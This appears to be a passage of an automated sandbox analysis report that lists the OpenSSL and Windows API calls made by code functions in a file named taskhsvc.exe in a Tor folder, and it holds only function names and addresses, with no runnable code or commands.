            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD3300 SSL_COMP_get_compression_methods,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,CRYPTO_mem_ctrl,sk_new,CRYPTO_malloc,COMP_zlib,sk_push,sk_sort,CRYPTO_mem_ctrl,CRYPTO_free,__stack_chk_fail,SSL_COMP_set0_compression_methods,__stack_chk_fail,SSL_COMP_free_compression_methods,sk_pop_free,__stack_chk_fail,SSL_COMP_add_compression_method,CRYPTO_mem_ctrl,CRYPTO_malloc,sk_find,sk_push,CRYPTO_mem_ctrl,ERR_put_error,CRYPTO_free,CRYPTO_mem_ctrl,ERR_put_error,CRYPTO_free,CRYPTO_mem_ctrl,ERR_put_error,CRYPTO_mem_ctrl,__stack_chk_fail,SSL_COMP_get_name,__stack_chk_fail,86_2_6CDD3300
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA8330 CRYPTO_lock,CRYPTO_lock,CRYPTO_free,CRYPTO_lock,__stack_chk_fail,86_2_6CDA8330
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDDC330 SSL_CONF_CTX_free,CRYPTO_free,86_2_6CDDC330
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCB329 CRYPTO_add_lock,CRYPTO_add_lock,X509_chain_up_ref,CRYPTO_malloc,86_2_6CDCB329
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD0320 SSL_CTX_get_info_callback,__stack_chk_fail,SSL_CTX_set_client_cert_cb,__stack_chk_fail,SSL_CTX_get_client_cert_cb,__stack_chk_fail,SSL_CTX_set_client_cert_engine,ENGINE_init,ENGINE_get_ssl_client_cert_function,ERR_put_error,ERR_put_error,ENGINE_finish,__stack_chk_fail,SSL_CTX_set_cookie_generate_cb,__stack_chk_fail,SSL_CTX_set_cookie_verify_cb,__stack_chk_fail,PEM_read_bio_SSL_SESSION,PEM_ASN1_read_bio,__stack_chk_fail,PEM_read_SSL_SESSION,PEM_ASN1_read,__stack_chk_fail,PEM_write_bio_SSL_SESSION,PEM_ASN1_write_bio,__stack_chk_fail,PEM_write_SSL_SESSION,PEM_ASN1_write,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,CRYPTO_lock,CRYPTO_lock,86_2_6CDD0320
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CED6BA0 RAND_poll,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetVersion,GetVersion,OPENSSL_isservice,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,RAND_add,FreeLibrary,GetTickCount,RAND_add,GlobalMemoryStatus,RAND_add,GetCurrentProcessId,RAND_add,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RAND_add,GetVersion,GetVersion,GetVersion,RAND_add,FreeLibrary,QueryPerformanceCounter,RAND_add,RAND_add,RAND_add,RAND_add,RAND_add,RAND_add,Heap32First,RAND_add,Heap32Next,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,RAND_add,RAND_add,RAND_add,GetTickCount,RAND_add,GetTickCount,RAND_add,GetTickCount,GetTickCount,RAND_add,GetTickCount,GetTickCount,GetTickCount,Heap32ListFirst,FindCloseChangeNotification,__stack_chk_fail,RAND_event,GetTickCount,RAND_add,RAND_add,RAND_add,RAND_add,RAND_status,QueryPerformanceCounter,RAND_add,__stack_chk_fail,RAND_screen,RAND_poll,GetVersion,OPENSSL_isservice,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,GetObjectA,CRYPTO_malloc,GetDIBits,EVP_sha1,EVP_Digest,RAND_add,CRYPTO_free,DeleteObject,ReleaseDC,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_free,CRYPTO_lock,__stack_chk_fail,CRYPTO_add_lock,__stack_chk_fail,CRYPTO_lock,CRYPTO_lock,CRYPTO_push_info_,lh_new,CRYPTO_pop_info,__stack_chk_fail,CRYPTO_lock,CRYPTO_lock,CRYPTO_push_info_,lh_new,CRYPTO_pop_info,__stack_chk_fail,__stack_chk_fail,CRYPTO_THREADID_hash,__stack_chk_fail,CRYPTO_THREADID_current,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_retrieve,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_insert,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_delete,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_retrieve,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_insert,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_delete,CRYPTO_lock,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,lh_num_items,lh_free,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,86_2_6CED6BA0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE23110 CRYPTO_malloc_locked,__stack_chk_fail,86_2_6CE23110
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE2ACE9 CRYPTO_free,CRYPTO_free,ERR_put_error,CRYPTO_free,86_2_6CE2ACE9
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEFCCE0 i2d_ASN1_SET,sk_num,sk_value,sk_value,sk_value,ASN1_object_size,ASN1_put_object,sk_value,sk_num,sk_num,sk_num,CRYPTO_malloc,sk_value,sk_num,sk_num,qsort,CRYPTO_malloc,sk_num,CRYPTO_free,CRYPTO_free,ERR_put_error,__stack_chk_fail,86_2_6CEFCCE0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF40CC0 X509_STORE_free,CRYPTO_add_lock,86_2_6CF40CC0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE4CCD0 AES_cfb1_encrypt,CRYPTO_cfb128_1_encrypt,__stack_chk_fail,AES_cfb8_encrypt,CRYPTO_cfb128_8_encrypt,__stack_chk_fail,AES_ofb128_encrypt,CRYPTO_ofb128_encrypt,__stack_chk_fail,AES_ctr128_encrypt,CRYPTO_ctr128_encrypt,__stack_chk_fail,AES_ige_encrypt,OpenSSLDie,AES_decrypt,OpenSSLDie,OpenSSLDie,AES_encrypt,AES_decrypt,AES_encrypt,__stack_chk_fail,AES_bi_ige_encrypt,OpenSSLDie,AES_decrypt,AES_decrypt,OpenSSLDie,AES_encrypt,AES_encrypt,OpenSSLDie,__stack_chk_fail,AES_wrap_key,CRYPTO_128_wrap,__stack_chk_fail,AES_unwrap_key,CRYPTO_128_unwrap,__stack_chk_fail,86_2_6CE4CCD0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE62CD0 CRYPTO_ofb128_encrypt,__stack_chk_fail,CRYPTO_gcm128_init,__stack_chk_fail,CRYPTO_gcm128_setiv,__stack_chk_fail,CRYPTO_gcm128_aad,86_2_6CE62CD0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF74CC0 OCSP_basic_sign,X509_check_private_key,EVP_sha1,X509_pubkey_digest,ASN1_OCTET_STRING_new,ASN1_OCTET_STRING_set,X509_get_subject_name,X509_NAME_set,X509_gmtime_adj,OCSP_RESPDATA_it,ASN1_item_sign,sk_new_null,sk_push,CRYPTO_add_lock,CRYPTO_add_lock,sk_num,sk_value,sk_push,ERR_put_error,sk_new_null,__stack_chk_fail,86_2_6CF74CC0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CED2CD0 sk_dup,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_realloc,CRYPTO_free,CRYPTO_free,__stack_chk_fail,86_2_6CED2CD0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE26CA0 CRYPTO_set_ex_data,sk_num,sk_push,sk_set,sk_new_null,__stack_chk_fail,CRYPTO_get_ex_data,__stack_chk_fail,ERR_load_CRYPTO_strings,ERR_func_error_string,ERR_load_strings,ERR_load_strings,__stack_chk_fail,86_2_6CE26CA0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF46CB0 X509_VERIFY_PARAM_set1_name,CRYPTO_free,BUF_strdup,86_2_6CF46CB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEDCCA0 EVP_MD_CTX_create,CRYPTO_malloc,86_2_6CEDCCA0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE28CB0 OBJ_NAME_do_all_sorted,lh_num_items,CRYPTO_malloc,lh_doall_arg,qsort,CRYPTO_free,__stack_chk_fail,86_2_6CE28CB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE22CB0 CRYPTO_set_mem_ex_functions,86_2_6CE22CB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF64CA0 PKCS7_add_signature,PKCS7_SIGNER_INFO_new,ASN1_INTEGER_set,PKCS7_SIGNER_INFO_free,X509_get_issuer_name,X509_NAME_set,ASN1_STRING_free,X509_get_serialNumber,ASN1_STRING_dup,CRYPTO_add_lock,EVP_MD_type,OBJ_nid2obj,X509_ALGOR_set0,PKCS7_add_signer,EVP_PKEY_get_default_digest_nid,ERR_put_error,ERR_put_error,__stack_chk_fail,PKCS7_set_digest,OBJ_obj2nid,ASN1_TYPE_new,ERR_put_error,__stack_chk_fail,86_2_6CF64CA0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEF4C80 EVP_PKEY_CTX_new,ENGINE_init,ENGINE_get_pkey_meth,CRYPTO_malloc,CRYPTO_add_lock,ENGINE_get_pkey_meth_engine,sk_find,OBJ_bsearch_,EVP_PKEY_free,EVP_PKEY_free,ENGINE_finish,CRYPTO_free,sk_value,ERR_put_error,ERR_put_error,ENGINE_finish,ERR_put_error,__stack_chk_fail,86_2_6CEF4C80
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE72C90 BN_bn2dec,BN_num_bits,CRYPTO_malloc,CRYPTO_malloc,BN_dup,CRYPTO_free,BN_free,BN_div_word,ERR_put_error,CRYPTO_free,BIO_snprintf,BIO_snprintf,ERR_put_error,CRYPTO_free,__stack_chk_fail,86_2_6CE72C90
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEC2C90 ENGINE_add_conf_module,CONF_module_add,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,ENGINE_get_ex_data,ERR_put_error,ENGINE_get_ex_new_index,CRYPTO_lock,CRYPTO_lock,CRYPTO_malloc,sk_new_null,CRYPTO_lock,ENGINE_get_ex_data,CRYPTO_lock,sk_free,CRYPTO_free,ERR_put_error,DSO_new,sk_num,sk_value,DSO_merge,DSO_load,CRYPTO_free,ERR_put_error,DSO_free,CRYPTO_free,BUF_strdup,CRYPTO_free,BUF_strdup,ERR_put_error,CRYPTO_free,CRYPTO_free,DSO_load,DSO_bind_func,DSO_bind_func,ENGINE_get_static_state,ERR_get_implementation,CRYPTO_get_ex_data_implementation,CRYPTO_get_mem_functions,CRYPTO_get_locking_callback,CRYPTO_get_add_lock_callback,CRYPTO_get_dynlock_create_callback,CRYPTO_get_dynlock_lock_callback,CRYPTO_get_dynlock_destroy_callback,ENGINE_add,ERR_put_error,BUF_strdup,sk_insert,DSO_convert_filename,ENGINE_set_ex_data,CRYPTO_lock,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,CRYPTO_free,DSO_free,ERR_put_error,DSO_free,ERR_put_error,ERR_put_error,CRYPTO_free,ERR_clear_error,DSO_free,ERR_put_error,__stack_chk_fail,__stack_chk_fail,ENGINE_load_dynamic,ENGINE_new,ENGINE_set_id,ENGINE_set_name,ENGINE_free,86_2_6CEC2C90
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE4CC60 AES_cfb128_encrypt,CRYPTO_cfb128_encrypt,86_2_6CE4CC60
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEF8C60 c2i_ASN1_OBJECT,ERR_put_error,CRYPTO_free,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_malloc,ERR_put_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_put_error,ERR_put_error,__stack_chk_fail,d2i_ASN1_OBJECT,ASN1_get_object,c2i_ASN1_OBJECT,86_2_6CEF8C60
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE2AC77 strlen,CRYPTO_malloc,86_2_6CE2AC77
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEBCC70 ENGINE_add,CRYPTO_lock,strcmp,ERR_put_error,ERR_put_error,CRYPTO_lock,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,ENGINE_remove,ERR_put_error,__stack_chk_fail,86_2_6CEBCC70
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE26C7C CRYPTO_lock,86_2_6CE26C7C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEFEC70 ASN1_sign,EVP_MD_CTX_init,ASN1_TYPE_free,ASN1_TYPE_new,ASN1_OBJECT_free,OBJ_nid2obj,CRYPTO_malloc,EVP_PKEY_size,CRYPTO_malloc,EVP_DigestInit_ex,ERR_put_error,EVP_MD_CTX_cleanup,OPENSSL_cleanse,CRYPTO_free,OPENSSL_cleanse,CRYPTO_free,ASN1_TYPE_free,ASN1_TYPE_free,ASN1_TYPE_new,ASN1_OBJECT_free,OBJ_nid2obj,ERR_put_error,EVP_MD_CTX_cleanup,ERR_put_error,ASN1_TYPE_free,86_2_6CEFEC70
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE8AC50 EC_GROUP_new_curve_GF2m,EC_GF2m_simple_method,EC_GROUP_new,EC_GROUP_set_curve_GF2m,EC_GROUP_clear_free,__stack_chk_fail,CRYPTO_add_lock,__stack_chk_fail,ERR_put_error,CRYPTO_free,CRYPTO_malloc,BN_num_bits,CRYPTO_malloc,BN_is_bit_set,ERR_put_error,ERR_put_error,__stack_chk_fail,86_2_6CE8AC50
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF76C30 UI_new_method,CRYPTO_malloc,CRYPTO_new_ex_data,UI_OpenSSL,ERR_put_error,__stack_chk_fail,86_2_6CF76C30
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE2AC29 ERR_put_error,CRYPTO_free,CRYPTO_free,86_2_6CE2AC29
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE22C10 CRYPTO_set_mem_functions,OPENSSL_init,__stack_chk_fail,CRYPTO_set_mem_ex_functions,__stack_chk_fail,CRYPTO_set_locked_mem_functions,__stack_chk_fail,CRYPTO_set_locked_mem_ex_functions,__stack_chk_fail,CRYPTO_set_mem_debug_functions,__stack_chk_fail,86_2_6CE22C10
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE24BB0 CRYPTO_dbg_malloc,CRYPTO_THREADID_current,CRYPTO_lock,CRYPTO_lock,CRYPTO_malloc,CRYPTO_THREADID_current,CRYPTO_THREADID_current,lh_retrieve,lh_insert,CRYPTO_free,CRYPTO_lock,CRYPTO_lock,time,CRYPTO_lock,CRYPTO_THREADID_cmp,CRYPTO_lock,lh_new,CRYPTO_free,CRYPTO_free,__stack_chk_fail,CRYPTO_dbg_free,__stack_chk_fail,CRYPTO_dbg_realloc,__stack_chk_fail,86_2_6CE24BB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CED8DF0 BIO_snprintf,strlen,strchr,strchr,strchr,strchr,BIO_snprintf,BIO_snprintf,BIO_snprintf,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,86_2_6CED8DF0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE22DC0 CRYPTO_set_locked_mem_ex_functions,86_2_6CE22DC0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE26DC0 CRYPTO_get_ex_data,sk_num,__stack_chk_fail,ERR_load_CRYPTO_strings,ERR_func_error_string,86_2_6CE26DC0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE5EDC0 SEED_ecb_encrypt,86_2_6CE5EDC0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE7CDC0 BN_MONT_CTX_new,CRYPTO_malloc,__stack_chk_fail,BN_MONT_CTX_init,BN_init,BN_init,BN_init,__stack_chk_fail,86_2_6CE7CDC0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF36DC0 NETSCAPE_SPKI_set_pubkey,__stack_chk_fail,NETSCAPE_SPKI_get_pubkey,__stack_chk_fail,NETSCAPE_SPKI_b64_decode,CRYPTO_malloc,EVP_DecodeBlock,d2i_NETSCAPE_SPKI,CRYPTO_free,ERR_put_error,CRYPTO_free,86_2_6CF36DC0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF6ADC0 PKCS12_pack_p7encdata,PKCS7_new,PKCS7_set_type,OBJ_nid2sn,EVP_get_cipherbyname,PKCS5_pbe2_set,X509_ALGOR_free,ASN1_STRING_free,PKCS12_SAFEBAGS_it,PKCS12_item_i2d_encrypt,PKCS5_pbe_set,ERR_put_error,PKCS7_free,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,86_2_6CF6ADC0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF6CDB0 PKCS12_item_i2d_encrypt,ASN1_STRING_type_new,ERR_put_error,__stack_chk_fail,86_2_6CF6CDB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF3ADA0 X509_STORE_CTX_new,CRYPTO_malloc,ERR_put_error,__stack_chk_fail,X509_STORE_CTX_free,__stack_chk_fail,86_2_6CF3ADA0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE44DB0 DES_ecb_encrypt,DES_encrypt1,__stack_chk_fail,DES_cbc_encrypt,DES_encrypt1,__stack_chk_fail,DES_ecb3_encrypt,DES_encrypt3,__stack_chk_fail,DES_cfb64_encrypt,__stack_chk_fail,DES_ede3_cfb64_encrypt,__stack_chk_fail,DES_ede3_cfb_encrypt,__stack_chk_fail,DES_cfb_encrypt,__stack_chk_fail,DES_ede3_ofb64_encrypt,__stack_chk_fail,_shadow_DES_rw_mode,__stack_chk_fail,DES_enc_read,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_malloc,86_2_6CE44DB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE4CDB0 AES_ofb128_encrypt,CRYPTO_ofb128_encrypt,86_2_6CE4CDB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF28D90 PEM_X509_INFO_read_bio,X509_INFO_new,PEM_read_bio,sk_push,X509_INFO_new,PEM_get_EVP_CIPHER_INFO,PEM_do_header,d2i_PrivateKey,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_PKEY_new,strlen,PEM_get_EVP_CIPHER_INFO,X509_PKEY_new,strlen,sk_new_null,ERR_put_error,sk_value,X509_INFO_free,sk_num,sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_PKEY_new,strlen,ERR_put_error,X509_INFO_free,ERR_peek_last_error,ERR_clear_error,sk_push,__stack_chk_fail,X509_INFO_free,86_2_6CF28D90
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE9ED80 RSA_sign,OBJ_nid2obj,i2d_X509_SIG,RSA_size,CRYPTO_malloc,i2d_X509_SIG,RSA_private_encrypt,OPENSSL_cleanse,CRYPTO_free,ERR_put_error,ERR_put_error,86_2_6CE9ED80
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF58D80 X509_check_purpose,CRYPTO_lock,86_2_6CF58D80
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE4CD40 AES_cfb8_encrypt,CRYPTO_cfb128_8_encrypt,86_2_6CE4CD40
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE22D50 CRYPTO_set_locked_mem_functions,86_2_6CE22D50
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF1AD30 a2i_ASN1_INTEGER,BIO_gets,CRYPTO_realloc_clean,BIO_gets,ERR_put_error,CRYPTO_free,ERR_put_error,CRYPTO_malloc,ERR_put_error,ERR_put_error,86_2_6CF1AD30
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE2AD39 strlen,CRYPTO_malloc,86_2_6CE2AD39
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF5CD10 X509_policy_tree_free,__stack_chk_fail,X509_policy_check,sk_num,CRYPTO_malloc,__stack_chk_fail,sk_push,sk_num,sk_free,X509_policy_tree_get0_user_policies,86_2_6CF5CD10
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF76D00 UI_free,sk_pop_free,CRYPTO_free_ex_data,__stack_chk_fail,86_2_6CF76D00
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEDCD10 EVP_DigestInit,EVP_MD_CTX_clear_flags,ENGINE_finish,ENGINE_get_digest_engine,ENGINE_get_digest,EVP_PKEY_CTX_ctrl,CRYPTO_free,ERR_put_error,CRYPTO_malloc,ERR_put_error,ERR_put_error,ENGINE_finish,__stack_chk_fail,EVP_DigestInit_ex,EVP_MD_CTX_clear_flags,ENGINE_finish,ENGINE_init,ENGINE_get_digest,EVP_PKEY_CTX_ctrl,CRYPTO_malloc,ERR_put_error,ERR_put_error,CRYPTO_free,ERR_put_error,ENGINE_get_digest_engine,ERR_put_error,ENGINE_finish,__stack_chk_fail,EVP_DigestUpdate,86_2_6CEDCD10
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF58EF0 X509_check_ca,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,X509_check_issued,X509_get_issuer_name,X509_get_subject_name,X509_NAME_cmp,__stack_chk_fail,ACCESS_DESCRIPTION_it,__stack_chk_fail,AUTHORITY_INFO_ACCESS_it,__stack_chk_fail,sk_value,i2v_GENERAL_NAME,sk_num,sk_new_null,__stack_chk_fail,sk_new_null,ERR_put_error,__stack_chk_fail,ACCESS_DESCRIPTION_free,ASN1_item_free,__stack_chk_fail,d2i_ACCESS_DESCRIPTION,ASN1_item_d2i,__stack_chk_fail,i2d_ACCESS_DESCRIPTION,ASN1_item_i2d,__stack_chk_fail,ACCESS_DESCRIPTION_new,ASN1_item_new,__stack_chk_fail,d2i_AUTHORITY_INFO_ACCESS,ASN1_item_d2i,__stack_chk_fail,i2d_AUTHORITY_INFO_ACCESS,ASN1_item_i2d,86_2_6CF58EF0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF62EF0 TXT_DB_free,lh_free,CRYPTO_free,CRYPTO_free,sk_num,sk_value,CRYPTO_free,sk_value,CRYPTO_free,sk_free,86_2_6CF62EF0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF6EEF0 OPENSSL_uni2asc,CRYPTO_malloc,__stack_chk_fail,i2d_PKCS12_bio,PKCS12_it,ASN1_item_i2d_bio,__stack_chk_fail,i2d_PKCS12_fp,PKCS12_it,ASN1_item_i2d_fp,__stack_chk_fail,d2i_PKCS12_bio,PKCS12_it,ASN1_item_d2i_bio,__stack_chk_fail,d2i_PKCS12_fp,PKCS12_it,ASN1_item_d2i_fp,__stack_chk_fail,PKCS12_x5092certbag,X509_it,PKCS12_item_pack_safebag,86_2_6CF6EEF0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF40EE0 X509_STORE_get_by_subject,CRYPTO_lock,86_2_6CF40EE0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE5EEF0 SEED_cfb128_encrypt,CRYPTO_cfb128_encrypt,__stack_chk_fail,SEED_ofb128_encrypt,CRYPTO_ofb128_encrypt,__stack_chk_fail,86_2_6CE5EEF0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE64EF0 CRYPTO_gcm128_decrypt_ctr32,86_2_6CE64EF0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE7EEC0 BN_GF2m_mod_mul,BN_num_bits,CRYPTO_malloc,86_2_6CE7EEC0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE54EA0 RC2_cfb64_encrypt,RC2_encrypt,RC2_encrypt,__stack_chk_fail,RC2_ofb64_encrypt,RC2_encrypt,__stack_chk_fail,86_2_6CE54EA0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE22EB0 CRYPTO_get_mem_functions,__stack_chk_fail,CRYPTO_get_mem_ex_functions,__stack_chk_fail,CRYPTO_get_locked_mem_functions,__stack_chk_fail,CRYPTO_get_locked_mem_ex_functions,__stack_chk_fail,CRYPTO_get_mem_debug_functions,86_2_6CE22EB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEBCEB0 ENGINE_remove,CRYPTO_lock,ERR_put_error,ERR_put_error,CRYPTO_lock,86_2_6CEBCEB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE4CE80 AES_ige_encrypt,OpenSSLDie,AES_decrypt,86_2_6CE4CE80
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF36E80 NETSCAPE_SPKI_b64_decode,CRYPTO_malloc,EVP_DecodeBlock,d2i_NETSCAPE_SPKI,CRYPTO_free,86_2_6CF36E80
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE60E60 CRYPTO_cts128_encrypt,__stack_chk_fail,CRYPTO_nistcts128_encrypt,__stack_chk_fail,CRYPTO_cts128_decrypt_block,CRYPTO_cbc128_decrypt,__stack_chk_fail,CRYPTO_nistcts128_decrypt_block,CRYPTO_cbc128_decrypt,CRYPTO_cbc128_decrypt,__stack_chk_fail,86_2_6CE60E60
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE24E42 CRYPTO_THREADID_cmp,CRYPTO_lock,86_2_6CE24E42
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF3AE50 X509_STORE_CTX_free,CRYPTO_free_ex_data,__stack_chk_fail,X509_STORE_CTX_init,X509_VERIFY_PARAM_new,ERR_put_error,X509_policy_tree_free,sk_pop_free,CRYPTO_free_ex_data,X509_VERIFY_PARAM_lookup,X509_VERIFY_PARAM_inherit,86_2_6CF3AE50
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF46E50 X509_VERIFY_PARAM_set_depth,__stack_chk_fail,X509_VERIFY_PARAM_set_time,__stack_chk_fail,X509_VERIFY_PARAM_add0_policy,sk_push,sk_new_null,__stack_chk_fail,X509_VERIFY_PARAM_set1_policies,sk_pop_free,sk_new_null,sk_value,OBJ_dup,sk_push,sk_num,ASN1_OBJECT_free,__stack_chk_fail,X509_VERIFY_PARAM_set1_host,memchr,strlen,sk_pop_free,BUF_strndup,sk_push,CRYPTO_free,sk_num,sk_free,sk_new_null,CRYPTO_free,__stack_chk_fail,86_2_6CF46E50
